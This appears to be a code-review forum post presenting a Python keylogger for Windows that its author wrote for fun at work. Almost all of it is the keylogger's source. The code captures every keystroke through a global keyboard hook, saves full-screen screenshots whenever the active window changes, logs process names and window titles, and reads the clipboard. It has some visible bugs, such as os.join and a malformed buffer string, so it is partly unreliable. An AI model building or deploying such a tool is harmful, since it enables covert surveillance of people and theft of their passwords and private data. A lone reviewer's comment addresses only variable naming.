# Python Keylogger

Tags: python, security, windows

Just a simple utility that logs the pressed keys in Python and takes a screenshot everytime a new PID is opened. Ì got bored at work, so decided I was going to have some fun with this.

*Made in Windows*

```
import os

import win32gui
import win32ui
import win32con
import win32api

from ctypes import *
import pythoncom
import pyHook
import win32clipboard
import screenshot


user32          = windll.user32
kernel32        = windll.kernel32
psapi           = windll.psapi
current_window  = None


def save_screenshot():
    # Get screen size
    w = win32api.GetSystemMetrics(win32con.SM_CXVIRTUALSCREEN)
    h = win32api.GetSystemMetrics(win32con.SM_CYVIRTUALSCREEN)
    l = win32api.GetSystemMetrics(win32con.SM_XVIRTUALSCREEN)
    t = win32api.GetSystemMetrics(win32con.SM_YVIRTUALSCREEN)

    # Create
    hdesktop = win32gui.GetDesktopWindow()
    desktop_dc = win32gui.GetWindowDC(hdesktop)
    img_dc = win32ui.CreateDCFromHandle(desktop_dc)
    mem_dc = img_dc.CreateCompatibleDC()

    # Fill
    screenshot = win32ui.CreateBitmap()
    screenshot.CreateCompatibleBitmap(img_dc, w, h)
    mem_dc.SelectObject(screenshot)
    mem_dc.BitBlt((0,0),(w, h) , img_dc, (l,t), win32con.SRCCOPY)

    # Save
    i = 0
    while os.path.exists("screenshot{0}.bmp".format(i)):
        i += 1
    filename = os.join(os.getcwd() ,'screenshot{0}.bmp'.format(str(i)))
    screenshot.SaveBitmapFile(mem_dc, filename)

    # Free Mem
    mem_dc.DeleteDC()
    win32gui.DeleteObject(screenshot.GetHandle())

def get_current_process():
    save_screenshot()
    print ('[*] Made screenshot')

    hwnd = user32.GetForegroundWindow()
    pid = c_ulong(0)
    user32.GetWindowThreadProcessId(hwnd, byref(pid))
    process_id = '{0}'.format(pid.value)
    executable = create_string_buffer('\x00' * 512)
    h_process = kernel32.OpenProcess(0x400 | 0x10, False, pid)
    psapi.GetModuleBaseNameA(h_process, None, byref(executable), 512)
    window_title = create_string_buffer('\0x00' * 512)
    length = user32.GetWindowTextA(hwnd, byref(window_title), 512)

    print ('\n[ PID:{0} - {1} - {2}]\n'.format(process_id, executable.value, window_title.value))

    kernel32.CloseHandle(hwnd)
    kernel32.CloseHandle(h_process)

def KeyStroke(event):
    global current_window
    if event.WindowName != current_window:
        current_window = event.WindowName
        get_current_process()
    if 32 < event.Ascii < 117:
        print (chr(event.Ascii))
    else:
        if event.Key == 'V':
            win32clipboard.OpenClipboard()
            pasted_value = win32clipboard.GetClipboardData()
            win32clipboard.CloseClipboard()
        else:
            print ('[{0}]'.format(event.Key))
    return True


if __name__ == '__main__':
    kl = pyHook.HookManager()
    kl.KeyDown = KeyStroke

    kl.HookKeyboard()
    pythoncom.PumpMessages()
```

Comment: ideally, globals are declared as `ALL_CAPS`; as can be seen from `win32con.SM_CYVIRTUALSCREEN` etc.